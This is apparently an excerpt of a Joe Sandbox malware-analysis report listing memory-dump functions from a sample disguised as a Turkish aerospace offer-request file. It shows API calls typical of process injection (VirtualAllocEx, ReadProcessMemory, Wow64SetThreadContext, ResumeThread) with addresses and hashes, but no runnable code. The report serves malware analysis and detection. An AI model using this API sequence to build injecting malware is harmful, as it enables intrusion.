Source File: 00000000.00000002.2181884141.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: DuplicateHandle
String ID: 5XX
API String ID: 3793708945-2543615521
Opcode ID: f1a23afc39fb742f8fa15f31cd2f914f1f38f99521afe2feaab09223a23df8dc
Instruction ID: 602a03aba947ee9de2c27b4eee063f3a2954679dd48afd2f2a64a2e1d0ca4f7a
Opcode Fuzzy Hash: f1a23afc39fb742f8fa15f31cd2f914f1f38f99521afe2feaab09223a23df8dc
Instruction Fuzzy Hash: 6621D4B5900209DFDB10CFAAD984ADEFBF4EB48320F14841AE914A3250D778A950CFA1

Function 0916F7C3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0916F846

Strings

5XX, xrefs: 0916F7E4

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ContextThreadWow64
String ID: 5XX
API String ID: 983334009-2543615521
Opcode ID: 3556264f5c0dc82e86b2ea846cd152c5f2343a62286ae5237f77568c7be129e6
Instruction ID: 63482f30e4b84b6e0cfa4932d1051d8ca18e9259196e5ec385dae4d408e1d74e
Opcode Fuzzy Hash: 3556264f5c0dc82e86b2ea846cd152c5f2343a62286ae5237f77568c7be129e6
Instruction Fuzzy Hash: D0213471D003098FDB10DFAAC5857AEBBF4EF88324F14842AE519A7240CB78A945CFA5

Function 0916FE50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0916FED0

Strings

5XX, xrefs: 0916FE6F

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MemoryProcessRead
String ID: 5XX
API String ID: 1726664587-2543615521
Opcode ID: 628684ef9e022da20ade7ed46644bc889109ca9c9f47d021d665ebafa4e3e790
Instruction ID: fb24f79927f5308c09329df418d2020fa0d71ca66e72ae8ab7b08bdfb1c9ce15
Opcode Fuzzy Hash: 628684ef9e022da20ade7ed46644bc889109ca9c9f47d021d665ebafa4e3e790
Instruction Fuzzy Hash: BF211671D003499FDB10CFAAC981AEEBBF5FF48310F10842AE558A7250C7789510CBA5

Function 0916FE48 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0916FED0

Strings

5XX, xrefs: 0916FE6F

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MemoryProcessRead
String ID: 5XX
API String ID: 1726664587-2543615521
Opcode ID: 46b28e9e3a0b9a4177b05960450dd238adf2f99e7e719bb5feae1f203a4e94b7
Instruction ID: 24f613e26e5e2bf28dd594da69bd414f85a9ee3bf7d752f07cc57d303f14b85f
Opcode Fuzzy Hash: 46b28e9e3a0b9a4177b05960450dd238adf2f99e7e719bb5feae1f203a4e94b7
Instruction Fuzzy Hash: 942103B2D00349DFDB10DFAAC981BEEBBF5BF48310F50842AE558A7250D7789511DBA1

Function 0916F7C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0916F846

Strings

5XX, xrefs: 0916F7E4

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ContextThreadWow64
String ID: 5XX
API String ID: 983334009-2543615521
Opcode ID: 558495c6085af4adaee6cfaf811adcf11da99932b0b4bfc34562c7db852c4748
Instruction ID: 7d801532b41c8a1d0337a7decef859a3d91edfc2e0d36777ee02282d6b44ee13
Opcode Fuzzy Hash: 558495c6085af4adaee6cfaf811adcf11da99932b0b4bfc34562c7db852c4748
Instruction Fuzzy Hash: 17213571D003098FDB10DFAAC5857EEBBF4EF88324F14842AD519A7240CB78A945CFA5

Function 02F8D9C1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F8D586,?,?,?,?,?), ref: 02F8DA4F

Strings

5XX, xrefs: 02F8D9E7

Memory Dump Source

Source File: 00000000.00000002.2181884141.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: DuplicateHandle
String ID: 5XX
API String ID: 3793708945-2543615521
Opcode ID: 307a7baf1be63e2e61c7af6cb1e3875aaa97d646b98a652267edd6cb4be2df80
Instruction ID: d9059a5cf7dcd1e56636eec4558d288d084d321092145e0d57a72e0ef820fe04
Opcode Fuzzy Hash: 307a7baf1be63e2e61c7af6cb1e3875aaa97d646b98a652267edd6cb4be2df80
Instruction Fuzzy Hash: 3F21D2B5D00209DFDB10CFA9D984AEEBBF4AB48320F24841AE918A3250D378A954CF61

Function 0916F89B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0916F90E

Strings

5XX, xrefs: 0916F8B7

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AllocVirtual
String ID: 5XX
API String ID: 4275171209-2543615521
Opcode ID: 4a149200cd1141678bcfdffefb00256b75bc51b8684bab980988e703496a9b12
Instruction ID: 024ae574de44364cc29d42f846d39ee976e8b06e5ecdba771ac03bbbec6f112f
Opcode Fuzzy Hash: 4a149200cd1141678bcfdffefb00256b75bc51b8684bab980988e703496a9b12
Instruction Fuzzy Hash: 641144729002499FDB10DFAAC845BDEBBF5EF88324F24881AE519A7250CB75A510CFA5

Function 0916F8A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0916F90E

Strings

5XX, xrefs: 0916F8B7

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AllocVirtual
String ID: 5XX
API String ID: 4275171209-2543615521
Opcode ID: a0ff305ad1b55dc1b5029ed42a6d18732432958fb05c9403fc560668b4363fc0
Instruction ID: 2e4382c97c10922676de5433477e40449b821c1c3a39a74e48f6625d1b69d931
Opcode Fuzzy Hash: a0ff305ad1b55dc1b5029ed42a6d18732432958fb05c9403fc560668b4363fc0
Instruction Fuzzy Hash: AF1156729002499FDB10CFAAC844BDEBBF5EF88324F20841AE519A7250CB75A510CFA1

Function 0916F2D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0916F342

Strings

5XX, xrefs: 0916F2F7

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ResumeThread
String ID: 5XX
API String ID: 947044025-2543615521
Opcode ID: 6fa5fa922fa1dae393a7b4d87b39ec5e3fea4213bbccff64db5b1fb0162cadd4
Instruction ID: 12287f153bacd3dd1f20154c047d52ed5f3fb269f7650b93478466cb2bd7af7c
Opcode Fuzzy Hash: 6fa5fa922fa1dae393a7b4d87b39ec5e3fea4213bbccff64db5b1fb0162cadd4
Instruction Fuzzy Hash: 451146B1D003498FDB20DFAAC84579EBBF4AB88624F24841AD519A7240CB79A500CB95

Function 0916F2E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0916F342

Strings

5XX, xrefs: 0916F2F7

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ResumeThread
String ID: 5XX
API String ID: 947044025-2543615521
Opcode ID: 85f8574008454e749f7324af7d2fb107a4606dd46ed891855e3163ed660c8e4d
Instruction ID: 43cd1410968e800a3c306bb750c99eed7328905a926c89c1f2f84738d071fe4d
Opcode Fuzzy Hash: 85f8574008454e749f7324af7d2fb107a4606dd46ed891855e3163ed660c8e4d
Instruction Fuzzy Hash: 201136B1D003498FDB20DFAAC4457DEFBF4AF88724F24842AD519A7240CB79A944CFA5

Function 02F8B5C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02F8B626

Strings

5XX, xrefs: 02F8B5DF

Memory Dump Source

Source File: 00000000.00000002.2181884141.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: HandleModule
String ID: 5XX
API String ID: 4139908857-2543615521
Opcode ID: 93e5d49d56cd28a1243e0b698583774145f6de4efe24e1271483e833b7a30fd9
Instruction ID: 08646f6d1ea487f11dafbd3dce93263320919cb741c5d1afe05f7f9702e8ab05
Opcode Fuzzy Hash: 93e5d49d56cd28a1243e0b698583774145f6de4efe24e1271483e833b7a30fd9
Instruction Fuzzy Hash: 45110FB6C003498FDB10DF9AC444ADEFBF4AF88224F10846AD928B7200C379A545CFA1

Function 07A843D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07A8442D

Strings

5XX, xrefs: 07A843EA

Memory Dump Source

Source File: 00000000.00000002.2188975268.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessagePost
String ID: 5XX
API String ID: 410705778-2543615521
Opcode ID: e134cbd380bc4c8bfc3f7611fe7e7919cad74f699ff3dd2c341ca1296dd2bc60
Instruction ID: 7f08b245c553c519df7d349c7ecb96deedceab7f959153e400dc0cf15fc1a193
Opcode Fuzzy Hash: e134cbd380bc4c8bfc3f7611fe7e7919cad74f699ff3dd2c341ca1296dd2bc60
Instruction Fuzzy Hash: 3411D3B5800359DFDB10DF9AD545BDEBBF8FB48720F24841AD518A7200D375A554CFA1

Function 07A843C9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07A8442D

Strings

5XX, xrefs: 07A843EA

Memory Dump Source

Source File: 00000000.00000002.2188975268.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessagePost
String ID: 5XX
API String ID: 410705778-2543615521
Opcode ID: a96d5fcafcb8746b38fb1d557e629a3586a07df2cc94a2bf9dfb46ec71d55fbe
Instruction ID: 4be91a736fe059102c67338ff18b3719b88c24fe25ff3e0469d2eaaaf42729af
Opcode Fuzzy Hash: a96d5fcafcb8746b38fb1d557e629a3586a07df2cc94a2bf9dfb46ec71d55fbe
Instruction Fuzzy Hash: 721103B580035ADFDB10DF99D545BDEBBF8FB48324F24841AD528A7200D375A554CFA1

Function 0167D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179545335.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_167d000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1165e47e24b775158eace98987d4d1ff8e5c837b38de5181f2d3e45cb7350b
Instruction ID: be34f144f989368f804229822af05066da44c50027f90291323466c0c283f326
Opcode Fuzzy Hash: ab1165e47e24b775158eace98987d4d1ff8e5c837b38de5181f2d3e45cb7350b
Instruction Fuzzy Hash: BF2103B2504240EFEB05DF54D9C0B2ABF65FF88328F24C969E9090B256C336D456CAA1

Function 0167D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179545335.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_167d000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b9578137bffaa3f944d1fa982c997b29103dcb361031717036f254a93150c79
Instruction ID: f3b1bcc96976a5d77815d109ada284d44425d796f114d38d9173774d4ea70db9
Opcode Fuzzy Hash: 1b9578137bffaa3f944d1fa982c997b29103dcb361031717036f254a93150c79
Instruction Fuzzy Hash: 212103B6504204EFDB05DF54D9C0B6ABF65FF88324F20C96DE90A4B25AC336E456CAA1

Function 0168D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179700087.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_168d000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3773d1ff5b181b245101d4c7c0a7fea2a00c3b799b90f2e43f7987d63d95a084
Instruction ID: 960e18d073bb4890f57869d562af2daac60bec94d54ca8a41c319c8eaf3de591
Opcode Fuzzy Hash: 3773d1ff5b181b245101d4c7c0a7fea2a00c3b799b90f2e43f7987d63d95a084
Instruction Fuzzy Hash: F6210075604204EFDB15EF94D980B26BB61EB84314F20C66DD90A4B392C77AD447CA71

Function 0168D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179700087.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_168d000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69ba825556fcb0cc4d04164b254e544ea8cadb11d4b083c6ba9a8aadde02da3d
Instruction ID: bc5a28475dda060a65cb7e68e4cc3ea2354b8af72ee3e756a1cce79cf743d564
Opcode Fuzzy Hash: 69ba825556fcb0cc4d04164b254e544ea8cadb11d4b083c6ba9a8aadde02da3d
Instruction Fuzzy Hash: 88210475504204EFDB05EF94D9D0F26BBA5FB88324F20C66DEA0A4B392C776D846CA71

Function 0168D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179700087.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_168d000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d89689f4e467d8b61bf4b25547a61d86b79f3ffdba97873d61407eb555c69e9d
Instruction ID: c7db6170d5f7da99c7988b2e053c84100d55ef0beffaecba269184cc4a46625b
Opcode Fuzzy Hash: d89689f4e467d8b61bf4b25547a61d86b79f3ffdba97873d61407eb555c69e9d
Instruction Fuzzy Hash: 5021A1755093808FDB03DF64D990B15BF71EB45214F28C6DAD8498B2A7C33AD40BCB62

Function 0167D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179545335.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_167d000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 3a1b93262ce7ea10cd85a564ce78e720968c864d69af8dfa5f48d6ed5edb346b
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: C011AFB6504280DFDB16CF54D9C4B1ABF71FB84328F24C6A9D8490B656C33AD456CBA1

Function 0167D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179545335.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_167d000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: f1c3d857a6eeab238fff0b68e65bd91b22b5fae5b8c5e14d67b3d765ceffd3e3
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 9711DFB6404280DFCB02CF44D9C0B56BF71FB84324F24C6A9D8090B25BC33AE456CBA1

Function 0168D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179700087.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_168d000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction ID: b39d9da88a2f0548fcf7f3e0dc8b98960d749277078a6f749faaf5edf49e2cf5
Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
Instruction Fuzzy Hash: 1611BB75504284DFCB02DF54C9D0B15BBB1FB84324F24C6A9D9494B3A6C33AD40ACB61

Non-executed Functions

Function 0916F390 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

F, xrefs: 0916F3EB

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-4058389470
Opcode ID: c462f0cf883daefd63887808c1ab661ffc0d897dc9aa503b441414c4f208ef98
Instruction ID: 1fdd5ec912ecb88537d8e8a110e1690be96290341960acc0c2dcb3c80ededa91
Opcode Fuzzy Hash: c462f0cf883daefd63887808c1ab661ffc0d897dc9aa503b441414c4f208ef98
Instruction Fuzzy Hash: 1CE11874E002598FDB14DFA9D590AAEBBB2FF89304F248269D415AB365C734AD42CF60

Function 07A86448 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2188975268.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7a80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9810d5dee6767e06ddeb1c7daf9c280b5361320b27d13a64d676ef21aa5f9fb9
Instruction ID: f9d469da3d9f64932c5df201718de218eb0fbc50931db4b86f9b5daac650d219
Opcode Fuzzy Hash: 9810d5dee6767e06ddeb1c7daf9c280b5361320b27d13a64d676ef21aa5f9fb9
Instruction Fuzzy Hash: FAD1AEB0B006058FEB59EF75C8607AEB7F6AF89300F14846AD1599B396CF39D901CB51

Function 056302D8 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943190.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5630000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1540d9a8d2c60234aecc8c76130d086c8c959eeabee0782515655dcec3a69ce7
Instruction ID: 5206684a7820130860e59a07fe2c6e1c90a7766fc39a3e93d947d53ae02d125f
Opcode Fuzzy Hash: 1540d9a8d2c60234aecc8c76130d086c8c959eeabee0782515655dcec3a69ce7
Instruction Fuzzy Hash: C912C6F0D897498AD752DF65E8CC189BBA2B748395FD04B09D2622F2E1D7BC106ACF44

Function 0916EA68 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c849278591f0ccfbc153d6828d0337dd0461b6dcb10bb0de7336bc0f5d415769
Instruction ID: 6be5f527066a2c5bb5195183dae628d8c0932cf1a6ccae2f3adbdc6d6495b211
Opcode Fuzzy Hash: c849278591f0ccfbc153d6828d0337dd0461b6dcb10bb0de7336bc0f5d415769
Instruction Fuzzy Hash: A8E11874E002598FCB14DFA9C590AAEBBB2FF88304F248269D419AB355D734AD52CF60

Function 0916CDF0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99933d38664056827f9b15aada967bb82223405c7de1d32a3af849e95d8439f3
Instruction ID: 12aa94b3c69a835aafffb880af74c3dc3d1d968e6d25534a5ec6dfccce840a07
Opcode Fuzzy Hash: 99933d38664056827f9b15aada967bb82223405c7de1d32a3af849e95d8439f3
Instruction Fuzzy Hash: 7AE13B74E002198FDB14DFA9D590AAEFBB2FF89304F248269D559AB355C730AD42CF60

Function 0916D228 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17228c63ceb73b2d55ef0a5cabfa8e0f6a8023f81687513e2cd5307d2943a93
Instruction ID: 53c5ccfb000e689eef630728bddc45227de3c276062ae8b47983ac421d2eafea
Opcode Fuzzy Hash: e17228c63ceb73b2d55ef0a5cabfa8e0f6a8023f81687513e2cd5307d2943a93
Instruction Fuzzy Hash: 43E10A74E00259CFDB14DFA9D590AAEBBB2FF88308F248269D415AB355D734AD42CF60

Function 0916E630 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2191472644.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9160000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936c870b2294a3dbde94d4c07fbccd792ef14fa1607dfcdb9000ea56b887bc19
Instruction ID: 903a02392d48f07d1ed9504b6dd36d3bcc730a7be97bdba6cdacd19a171ce573
Opcode Fuzzy Hash: 936c870b2294a3dbde94d4c07fbccd792ef14fa1607dfcdb9000ea56b887bc19
Instruction Fuzzy Hash: 2CE11874E00259CFDB14DFA9D590AAEBBB2FF89304F248269D415AB355C730AD52CFA0

Function 0563F008 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943190.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5630000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c3f5a660ed22a0ba4ea5ba3023640fa9b307833c6d815dd141a1df4ebca740
Instruction ID: d51b15009c1dfa8eba965c62def7e6b59a4f97b9a784aa0123531889c1dcb7d4
Opcode Fuzzy Hash: 94c3f5a660ed22a0ba4ea5ba3023640fa9b307833c6d815dd141a1df4ebca740
Instruction Fuzzy Hash: 4ED1E331C2075ACACB15EF64D9906A9B771FFD5300F509BAAE5093B220EB746ED4CB90

Function 0563F018 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2185943190.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5630000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2581a0248bc69d1cfd005fa43bb8b83543da33393d3dd2cfffcb14622c681f6e
Instruction ID: 3ab3f82bf48313ebabdfdd1c675ade38951794ae0584cf3119124dba033c5f18
Opcode Fuzzy Hash: 2581a0248bc69d1cfd005fa43bb8b83543da33393d3dd2cfffcb14622c681f6e
Instruction Fuzzy Hash: 12D1D33182075ACADB15EF64D8906A9B771FFD5300F509BAAE5093B220EF746ED4CB90

Function 02F8D8EC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2181884141.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 597589a25502789389f770df1b97bc5dcd92cadae7579b90df253b5c8ac08e87
Instruction ID: abde8bac26b48fc8ac1fc74c6ced16fcbcbffc7759ffc2e35335eebe232c839a
